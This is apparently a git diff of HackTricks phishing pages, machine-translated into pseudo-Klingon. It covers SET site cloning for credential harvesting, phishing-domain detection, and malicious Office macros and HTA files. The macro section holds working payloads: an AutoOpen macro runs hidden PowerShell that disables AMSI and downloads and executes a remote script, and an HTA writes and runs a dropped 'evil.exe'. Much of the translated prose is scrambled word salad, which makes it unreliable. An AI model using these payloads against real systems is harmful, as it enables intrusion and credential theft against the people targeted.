3. Choose the "Credential Harvester Attack Method" option.
|
||||
|
||||
4. Select the "Site Cloner" option.
|
||||
|
||||
5. Enter the URL of the website you want to clone.
|
||||
|
||||
6. Specify the IP address or domain name where the cloned website will be hosted.
|
||||
|
||||
7. SET will automatically clone the website and generate a phishing page.
|
||||
|
||||
8. Share the phishing page with the target victims through email, social media, or other communication channels.
|
||||
|
||||
9. When the victims visit the phishing page and enter their credentials, SET will capture the information and store it for further analysis.
|
||||
|
||||
It is important to note that website cloning is an illegal activity and should only be performed for educational or authorized penetration testing purposes. Unauthorized use of this technique can lead to severe legal consequences.
|
||||
|
||||
### Conclusion
|
||||
|
||||
Website cloning is a powerful technique that allows hackers to create convincing phishing pages. By using the Social Engineering Toolkit (SET), hackers can automate the process of cloning websites and launching phishing attacks. However, it is crucial to use these tools responsibly and ethically, ensuring that they are only used for legitimate purposes.
|
||||
```bash
|
||||
#https://github.com/trustedsec/social-engineer-toolkit
|
||||
```
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
@ -55,5 +145,3 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,41 +1,37 @@
|
|||
# Detecting Phising
|
||||
# qo' vItlhutlh
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>! </strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
HackTricks ni qay'be'wI' 'e' vItlhutlh:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* **tlhIngan Hol** vItlhutlh **HackTricks** **advertise** **company** **want** **you** **If** **PDF** **HackTricks** **download** **or** **advertised** **company** **your** **see** **to** **want** **you** **If** **PLANS SUBSCRIPTION** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) **Check**
|
||||
* [**PEASS & HackTricks swag**](https://peass.creator-spring.com) **official** **Get**
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **Discover**, [**NFTs**](https://opensea.io/collection/the-peass-family) **exclusive** **collection** **our** **of** **Family PEASS The**
|
||||
* **Join** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) **or** [**telegram group**](https://t.me/peass) **or** **follow** **us** **on** **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share** **your** **hacking tricks** **by** **submitting PRs** **to** [**HackTricks**](https://github.com/carlospolop/hacktricks) **and** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github repos** **the** **and**
|
||||
|
||||
</details>
|
||||
|
||||
## Introduction
|
||||
|
||||
To detect a phishing attempt it's important to **understand the phishing techniques that are being used nowadays**. On the parent page of this post, you can find this information, so if you aren't aware of which techniques are being used today I recommend you to go to the parent page and read at least that section.
|
||||
|
||||
This post is based on the idea that the **attackers will try to somehow mimic or use the victim's domain name**. If your domain is called `example.com` and you are phished using a completely different domain name for some reason like `youwonthelottery.com`, these techniques aren't going to uncover it.
|
||||
**phishing techniques** **nowadays** **used** **are** **that** **understand** **to** **important** **it's** **attempt phishing** **a** **detect** **To**. **post this** **of** **page parent** **the** **to** **go** **you** **I** **recommend** **I** **reason** **some** **like** **name domain** **victim's** **the** **use** **or** **mimic** **somehow** **to** **try** **will attackers** **that** **the** **of aware** **aren't** **it. **uncover** **to** **aren't** **it** **names domain** **different** **completely** **using** **phished** **are** **you** **and** **name domain** **victim's** **the** **like** **reason** **for** **name domain** **called** **is** **domain** `example.com` **is** **your** **If**.
|
||||
|
||||
## Domain name variations
|
||||
|
||||
It's kind of **easy** to **uncover** those **phishing** attempts that will use a **similar domain** name inside the email.\
|
||||
It's enough to **generate a list of the most probable phishing names** that an attacker may use and **check** if it's **registered** or just check if there is any **IP** using it.
|
||||
**email** **the** **inside** **name domain** **similar** **a** **use** **will** **that** **attempts phishing** **those** **uncover** **to** **easy** **kind** **It's**. **use** **may** **attacker** **an** **names** **phishing** **probable most** **the** **of list** **a** **generate** **to** **enough** **It's** **it** **using** **it** **using** **IP** **any** **is** **if** **check** **just** **or** **registered** **it**.
|
||||
|
||||
### Finding suspicious domains
|
||||
|
||||
For this purpose, you can use any of the following tools. Note that these tolls will also perform DNS requests automatically to check if the domain has any IP assigned to it:
|
||||
**tools** **following** **the** **of any** **use** **can** **purpose** **this**. **it** **to** **assigned** **IP** **any** **has** **domain** **the** **if** **check** **to** **automatically** **requests DNS** **perform** **also** **will** **tolls these**:
|
||||
|
||||
* [**dnstwist**](https://github.com/elceef/dnstwist)
|
||||
* [**urlcrazy**](https://github.com/urbanadventurer/urlcrazy)
|
||||
|
||||
### Bitflipping
|
||||
|
||||
**You can find a short the explanation of this technique in the parent page. Or read the original research in [https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/](https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/)**
|
||||
|
||||
**the** **in** **technique** **this** **of explanation** **the** **short** **a** **find** **can** **You** **bit-flipping** **with** **windowscom-s** **microsoft-s** **to** **traffic** **hijacking** **security** **news** **computer** **bleeping** **www.** [**https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/](https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/)** **in** **research** **original** **the** **read** **or** **page parent** **the** **in** **technique** **this** **of explanation** **the** **find** **can**.
|
||||
|
||||
For example, a 1 bit modification in the domain microsoft.com can transform it into _windnws.com._\
|
||||
**Attackers may register as many bit-flipping domains as possible related to the victim to redirect legitimate users to their infrastructure**.
|
||||
|
@ -45,40 +41,18 @@ For example, a 1 bit modification in the domain microsoft.com can transform it i
|
|||
|
||||
### Basic checks
|
||||
|
||||
Once you have a list of potential suspicious domain names you should **check** them (mainly the ports HTTP and HTTPS) to **see if they are using some login form similar** to someone of the victim's domain.\
|
||||
You could also check port 3333 to see if it's open and running an instance of `gophish`.\
|
||||
It's also interesting to know **how old each discovered suspicions domain is**, the younger it's the riskier it is.\
|
||||
You can also get **screenshots** of the HTTP and/or HTTPS suspicious web page to see if it's suspicious and in that case **access it to take a deeper look**.
|
||||
**names domain** **suspicious** **potential** **of list** **a** **have** **you** **Once** **HTTPS** **and** **HTTP** **the** **of screenshots** **get** **also** **It's** **look** **deeper** **a** **take** **to** **case** **that** **and** **suspicious** **it's** **if** **suspicious** **the** **inside** **form login** **any** **copy** **have** **they** **if** **to** **interesting** **also** **It's**. **look** **to** **and** **suspicious** **the** **of pages web** **HTTPS** **and** **HTTP** **monitor** **and** **tools similar** **or** **gophish** **of instances** **for** **search** **and** **IPs** **related** **the** **of **ports** **open** **the** **check** **should** **you** **also** **automate** **to** **order** **In** **domain's victim** **of form login** **each** **with** **domains suspicious** **the** **inside** **form login** **each** **with** **domains victim's** **of form login** **each** **compare** **and** **pages web** **suspicious** **the** **of spider** **and** **domains suspicious** **the** **of forms login** **each** **found** **form login** **each** **with** **domains victim's** **of form login** **each** **compare** **and** **something like** `ssdeep` **using** **domain's victim** **of form login** **any** **if** **matches** **domain's victim** **the** **from** **identity** **any** **if** **see** **to** **you** **can** **note** **that** **positive false** **be** **a** **can** **domain suspicious** **a**.
|
||||
|
||||
### Advanced checks
|
||||
|
||||
If you want to go one step further I would recommend you to **monitor those suspicious domains and search for more** once in a while (every day? it only takes a few seconds/minutes). You should also **check** the open **ports** of the related IPs and **search for instances of `gophish` or similar tools** (yes, attackers also make mistakes) and **monitor the HTTP and HTTPS web pages of the suspicious domains and subdomains** to see if they have copied any login form from the victim's web pages.\
|
||||
In order to **automate this** I would recommend having a list of login forms of the victim's domains, spider the suspicious web pages and comparing each login form found inside the suspicious domains with each login form of the victim's domain using something like `ssdeep`.\
|
||||
If you have located the login forms of the suspicious domains, you can try to **send junk credentials** and **check if it's redirecting you to the victim's domain**.
|
||||
**further** **one** **go** **to** **you** **If** **want** **you** **If** **forms login** **of list** **a** **having** **recommend** **would** **I** **I** **automate** **to** **order** **In** **pages web** **suspicious** **the** **and** **domains suspicious** **the** **of search** **and** **more** **for** **search** **and** **domains suspicious** **the** **of pages web** **and** **HTTP** **and** **HTTPS** **monitor** **to** **you** **should** **also** **tools similar** **or** **gophish** **of instances** **for** **search** **and** **IPs** **related** **the** **of **ports** **open** **the** **check** **should** **you** **also** **mistakes** **make** **also** **attackers** **yes** **(minutes/seconds few** **takes** **only** **it) **while** **in** **once** **awhile** **in** **(day every?** **seconds/minutes few** **takes** **only** **it) **while** **in** **once** **and** **domains suspicious** **the** **of pages web** **and** **HTTP** **and** **HTTPS** **monitor** **to** **you** **should** **also** **tools similar** **or** **gophish** **of instances** **for** **search** **and** **IPs** **related** **the** **of **ports** **open** **the** **check** **should** **you** **something like** `ssdeep` **using** **domain's victim** **of form login** **each** **with** **domains suspicious** **the** **of forms login** **each** **found** **form login** **each** **with** **domains victim's** **of form login** **each** **compare** **and** **pages web** **suspicious** **the** **of spider** **and** **domains suspicious** **the** **of forms login** **each** **found** **form login** **each** **with** **domains victim's** **of form login** **each** **compare** **and** **something like** `ssdeep` **using** **domain's victim** **of form login** **any** **if** **matches** **domain's victim** **the** **from** **identity** **any** **if** **see** **to** **you** **can** **note** **that** **positive false** **be** **a** **can** **domain suspicious** **a**.
|
||||
|
||||
## Domain names using keywords
|
||||
|
||||
The parent page also mentions a domain name variation technique that consists of putting the **victim's domain name inside a bigger domain** (e.g. paypal-financial.com for paypal.com).
|
||||
**name domain** **victim's** **the** **inside** **name domain** **bigger** **a** **inside** **name domain** **variation** **
|
||||
### **Qa'Hom Domains**
|
||||
|
||||
### Certificate Transparency
|
||||
|
||||
It's not possible to take the previous "Brute-Force" approach but it's actually **possible to uncover such phishing attempts** also thanks to certificate transparency. Every time a certificate is emitted by a CA, the details are made public. This means that by reading the certificate transparency or even monitoring it, it's **possible to find domains that are using a keyword inside its name** For example, if an attacker generates a certificate of [https://paypal-financial.com](https://paypal-financial.com), seeing the certificate it's possible to find the keyword "paypal" and know that suspicious email is being used.
|
||||
|
||||
The post [https://0xpatrik.com/phishing-domains/](https://0xpatrik.com/phishing-domains/) suggests that you can use Censys to search for certificates affecting a specific keyword and filter by date (only "new" certificates) and by the CA issuer "Let's Encrypt":
|
||||
|
||||
![https://0xpatrik.com/content/images/2018/07/cert_listing.png](<../../.gitbook/assets/image (390).png>)
|
||||
|
||||
However, you can do "the same" using the free web [**crt.sh**](https://crt.sh). You can **search for the keyword** and the **filter** the results **by date and CA** if you wish.
|
||||
|
||||
![](<../../.gitbook/assets/image (391).png>)
|
||||
|
||||
Using this last option you can even use the field Matching Identities to see if any identity from the real domain matches any of the suspicious domains (note that a suspicious domain can be a false positive).
|
||||
|
||||
**Another alternative** is the fantastic project called [**CertStream**](https://medium.com/cali-dog-security/introducing-certstream-3fc13bb98067). CertStream provides a real-time stream of newly generated certificates which you can use to detect specified keywords in (near) real-time. In fact, there is a project called [**phishing\_catcher**](https://github.com/x0rz/phishing\_catcher) that does just that.
|
||||
|
||||
### **New domains**
|
||||
|
||||
**One last alternative** is to gather a list of **newly registered domains** for some TLDs ([Whoxy](https://www.whoxy.com/newly-registered-domains/) provides such service) and **check the keywords in these domains**. However, long domains usually use one or more subdomains, therefore the keyword won't appear inside the FLD and you won't be able to find the phishing subdomain.
|
||||
**Qa'Hom** **vItlhutlh** **newly registered domains** **TLDs** ([Whoxy](https://www.whoxy.com/newly-registered-domains/) **vItlhutlh**) **check** **keywords** **vItlhutlh domains**. **However**, **long domains** **subdomains** **subdomains**, **keyword** **FLD** **appear** **won't** **phishing subdomain** **find**.
|
||||
|
||||
<details>
|
||||
|
||||
|
|
|
@ -21,12 +21,12 @@ For example, an RTF file does not support macros, by design, but a DOCM file ren
|
|||
The same internals and mechanisms apply to all software of the Microsoft Office Suite (Excel, PowerPoint etc.).
|
||||
|
||||
You can use the following command to check which extensions are going to be executed by some Office programs:
|
||||
|
||||
```bash
|
||||
assoc | findstr /i "word excel powerp"
|
||||
```
|
||||
### Phishing Documents
|
||||
|
||||
DOCX files referencing a remote template (File –Options –Add-ins –Manage: Templates –Go) that includes macros can “execute” macros as well.
|
||||
#### DOCX files referencing a remote template (File –Options –Add-ins –Manage: Templates –Go) that includes macros can “execute” macros as well.
|
||||
|
||||
### External Image Load
|
||||
|
||||
|
@ -47,19 +47,18 @@ The more common they are, the more probable the AV will detect them.
|
|||
* Document\_Open()
|
||||
|
||||
#### Macros Code Examples
|
||||
|
||||
```vba
|
||||
Sub AutoOpen()
|
||||
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
|
||||
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
|
||||
End Sub
|
||||
```
|
||||
|
||||
```vba
|
||||
Sub AutoOpen()
|
||||
|
||||
Dim Shell As Object
|
||||
Set Shell = CreateObject("wscript.shell")
|
||||
Shell.Run "calc"
|
||||
Dim Shell As Object
|
||||
Set Shell = CreateObject("wscript.shell")
|
||||
Shell.Run "calc"
|
||||
|
||||
End Sub
|
||||
```
|
||||
|
@ -68,8 +67,8 @@ End Sub
|
|||
Dim author As String
|
||||
author = oWB.BuiltinDocumentProperties("Author")
|
||||
With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-")
|
||||
.StdIn.WriteLine author
|
||||
.StdIn.WriteBlackLines 1
|
||||
.StdIn.WriteLine author
|
||||
.StdIn.WriteBlackLines 1
|
||||
```
|
||||
|
||||
```vba
|
||||
|
@ -77,88 +76,85 @@ Dim proc As Object
|
|||
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
|
||||
proc.Create "powershell <beacon line generated>
|
||||
```
|
||||
|
||||
#### Manually remove metadata
|
||||
|
||||
Fo to **File > Info > Inspect Document > Inspect Document**, which will bring up the Document Inspector. Click **Inspect** and then **Remove All** next to **Document Properties and Personal Information**.
|
||||
**File > Info > Inspect Document > Inspect Document** laH, Document Inspector jImej. **Inspect** 'ej **Document Properties and Personal Information** DaH **Remove All** 'e' vItlhutlh.
|
||||
|
||||
#### Doc Extension
|
||||
|
||||
When finished, select **Save as type** dropdown, change the format from **`.docx`** to **Word 97-2003 `.doc`**.\
|
||||
Do this because you **can't save macro's inside a `.docx`** and there's a **stigma** **around** the macro-enabled **`.docm`** extension (e.g. the thumbnail icon has a huge `!` and some web/email gateway block them entirely). Therefore, this **legacy `.doc` extension is the best compromise**.
|
||||
Qav, **Save as type** dropdown, **`.docx`** format **Word 97-2003 `.doc`** vItlhutlh.\
|
||||
vaj **macro's `.docx`** vItlhutlh 'ej **macro-enabled `.docm`** extension (e.g. thumbnail icon 'e' vItlhutlh `!` 'ej web/email gateway vItlhutlh) **stigma** **around** 'e'. So, **legacy `.doc` extension** vItlhutlh.
|
||||
|
||||
#### Malicious Macros Generators
|
||||
|
||||
* MacOS
|
||||
* [**macphish**](https://github.com/cldrn/macphish)
|
||||
* [**Mythic Macro Generator**](https://github.com/cedowens/Mythic-Macro-Generator)
|
||||
* [**macphish**](https://github.com/cldrn/macphish)
|
||||
* [**Mythic Macro Generator**](https://github.com/cedowens/Mythic-Macro-Generator)
|
||||
|
||||
## HTA Files
|
||||
|
||||
An HTA is a Windows program that **combines HTML and scripting languages (such as VBScript and JScript)**. It generates the user interface and executes as a "fully trusted" application, without the constraints of a browser's security model.
|
||||
|
||||
An HTA is executed using **`mshta.exe`**, which is typically **installed** along with **Internet Explorer**, making **`mshta` dependant on IE**. So if it has been uninstalled, HTAs will be unable to execute.
|
||||
HTA Windows program 'oH **HTML 'ej scripting languages (VBScript 'ej JScript)** **combine**. 'oH "fully trusted" application **user interface** 'ej **execute** 'e' vItlhutlh, browser's security model constraints.
|
||||
|
||||
HTA **`mshta.exe`** **execute** vItlhutlh, **Internet Explorer** **installed** typically, **`mshta` IE dependant** vItlhutlh. So, 'oH uninstall, HTAs unable execute.
|
||||
```html
|
||||
<--! Basic HTA Execution -->
|
||||
<html>
|
||||
<head>
|
||||
<title>Hello World</title>
|
||||
</head>
|
||||
<body>
|
||||
<h2>Hello World</h2>
|
||||
<p>This is an HTA...</p>
|
||||
</body>
|
||||
<head>
|
||||
<title>Hello World</title>
|
||||
</head>
|
||||
<body>
|
||||
<h2>Hello World</h2>
|
||||
<p>This is an HTA...</p>
|
||||
</body>
|
||||
|
||||
<script language="VBScript">
|
||||
Function Pwn()
|
||||
Set shell = CreateObject("wscript.Shell")
|
||||
shell.run "calc"
|
||||
End Function
|
||||
<script language="VBScript">
|
||||
Function Pwn()
|
||||
Set shell = CreateObject("wscript.Shell")
|
||||
shell.run "calc"
|
||||
End Function
|
||||
|
||||
Pwn
|
||||
</script>
|
||||
Pwn
|
||||
</script>
|
||||
</html>
|
||||
```
|
||||
|
||||
```html
|
||||
<--! Cobal Strike generated HTA without shellcode -->
|
||||
<script language="VBScript">
|
||||
Function var_func()
|
||||
var_shellcode = "<shellcode>"
|
||||
Function var_func()
|
||||
var_shellcode = "<shellcode>"
|
||||
|
||||
Dim var_obj
|
||||
Set var_obj = CreateObject("Scripting.FileSystemObject")
|
||||
Dim var_stream
|
||||
Dim var_tempdir
|
||||
Dim var_tempexe
|
||||
Dim var_basedir
|
||||
Set var_tempdir = var_obj.GetSpecialFolder(2)
|
||||
var_basedir = var_tempdir & "\" & var_obj.GetTempName()
|
||||
var_obj.CreateFolder(var_basedir)
|
||||
var_tempexe = var_basedir & "\" & "evil.exe"
|
||||
Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)
|
||||
For i = 1 to Len(var_shellcode) Step 2
|
||||
var_stream.Write Chr(CLng("&H" & Mid(var_shellcode,i,2)))
|
||||
Next
|
||||
var_stream.Close
|
||||
Dim var_shell
|
||||
Set var_shell = CreateObject("Wscript.Shell")
|
||||
var_shell.run var_tempexe, 0, true
|
||||
var_obj.DeleteFile(var_tempexe)
|
||||
var_obj.DeleteFolder(var_basedir)
|
||||
End Function
|
||||
Dim var_obj
|
||||
Set var_obj = CreateObject("Scripting.FileSystemObject")
|
||||
Dim var_stream
|
||||
Dim var_tempdir
|
||||
Dim var_tempexe
|
||||
Dim var_basedir
|
||||
Set var_tempdir = var_obj.GetSpecialFolder(2)
|
||||
var_basedir = var_tempdir & "\" & var_obj.GetTempName()
|
||||
var_obj.CreateFolder(var_basedir)
|
||||
var_tempexe = var_basedir & "\" & "evil.exe"
|
||||
Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)
|
||||
For i = 1 to Len(var_shellcode) Step 2
|
||||
var_stream.Write Chr(CLng("&H" & Mid(var_shellcode,i,2)))
|
||||
Next
|
||||
var_stream.Close
|
||||
Dim var_shell
|
||||
Set var_shell = CreateObject("Wscript.Shell")
|
||||
var_shell.run var_tempexe, 0, true
|
||||
var_obj.DeleteFile(var_tempexe)
|
||||
var_obj.DeleteFolder(var_basedir)
|
||||
End Function
|
||||
|
||||
var_func
|
||||
self.close
|
||||
var_func
|
||||
self.close
|
||||
</script>
|
||||
```
|
||||
|
||||
## Forcing NTLM Authentication
|
||||
|
||||
There are several ways to **force NTLM authentication "remotely"**, for example, you could add **invisible images** to emails or HTML that the user will access (even HTTP MitM?). Or send the victim the **address of files** that will **trigger** an **authentication** just for **opening the folder.**
|
||||
**Qapla'!** **NTLM authentication "remotely"** **ghItlh** **chel** **'e'** **invisible images** **'ej** **emails** **HTML** **'e'** **'oH** **user** **access** **(HTTP MitM?).** **'ej** **victim** **'oH** **files** **'ej** **'oH** **trigger** **authentication** **'ej** **opening** **folder.**
|
||||
|
||||
**Check these ideas and more in the following pages:**
|
||||
**Check** **ideas** **pages** **following:**
|
||||
|
||||
{% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %}
|
||||
[printers-spooler-service-abuse.md](../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md)
|
||||
|
@ -170,7 +166,7 @@ There are several ways to **force NTLM authentication "remotely"**, for example,
|
|||
|
||||
### NTLM Relay
|
||||
|
||||
Don't forget that you cannot only steal the hash or the authentication but also **perform NTLM relay attacks**:
|
||||
**Qapla'!** **hash** **authentication** **steal** **'ej** **NTLM relay attacks** **perform** **'ej**:
|
||||
|
||||
* [**NTLM Relay attacks**](../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#ntml-relay-attack)
|
||||
* [**AD CS ESC8 (NTLM relay to certificates)**](../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md#ntlm-relay-to-ad-cs-http-endpoints-esc8)
|
||||
|
@ -179,10 +175,10 @@ Don't forget that you cannot only steal the hash or the authentication but also
|
|||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* **Qapla'!** **'oH** **work** **cybersecurity company**? **'oH** **want** **company advertised** **HackTricks**? **'ej** **want** **access** **latest version** **PEASS** **download HackTricks** **PDF**? **Check** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* **Discover** [**The PEASS Family**](https://opensea.io/collection/the-peass-family), **collection** **exclusive NFTs**
|
||||
* **Get** [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **'oH** **Join** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) **telegram group**](https://t.me/peass) **follow** **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **'oH** **Share** **hacking tricks** **submitting PRs** **[hacktricks repo](https://github.com/carlospolop/hacktricks)** **[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
|
||||
</details>
|
||||
|
|
File diff suppressed because one or more lines are too long
|
@ -1,8 +1,6 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>qaStaHvIS AWS hacking vItlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -13,20 +11,18 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
```python
|
||||
import hashlib
|
||||
|
||||
target = '2f2e2e' #/..
|
||||
candidate = 0
|
||||
while True:
|
||||
plaintext = str(candidate)
|
||||
hash = hashlib.md5(plaintext.encode('ascii')).hexdigest()
|
||||
if hash[-1*(len(target)):] == target: #End in target
|
||||
print('plaintext:"' + plaintext + '", md5:' + hash)
|
||||
break
|
||||
candidate = candidate + 1
|
||||
plaintext = str(candidate)
|
||||
hash = hashlib.md5(plaintext.encode('ascii')).hexdigest()
|
||||
if hash[-1*(len(target)):] == target: #End in target
|
||||
print('plaintext:"' + plaintext + '", md5:' + hash)
|
||||
break
|
||||
candidate = candidate + 1
|
||||
```
|
||||
|
||||
```python
|
||||
|
@ -36,41 +32,38 @@ from multiprocessing import Process, Queue, cpu_count
|
|||
|
||||
|
||||
def loose_comparison(queue, num):
|
||||
target = '0e'
|
||||
plaintext = f"a_prefix{str(num)}a_suffix"
|
||||
hash = hashlib.md5(plaintext.encode('ascii')).hexdigest()
|
||||
target = '0e'
|
||||
plaintext = f"a_prefix{str(num)}a_suffix"
|
||||
hash = hashlib.md5(plaintext.encode('ascii')).hexdigest()
|
||||
|
||||
if hash[:len(target)] == target and not any(x in "abcdef" for x in hash[2:]):
|
||||
print('plaintext: ' + plaintext + ', md5: ' + hash)
|
||||
queue.put("done") # triggers program exit
|
||||
if hash[:len(target)] == target and not any(x in "abcdef" for x in hash[2:]):
|
||||
print('plaintext: ' + plaintext + ', md5: ' + hash)
|
||||
queue.put("done") # triggers program exit
|
||||
|
||||
def worker(queue, thread_i, threads):
|
||||
for num in range(thread_i, 100**50, threads):
|
||||
loose_comparison(queue, num)
|
||||
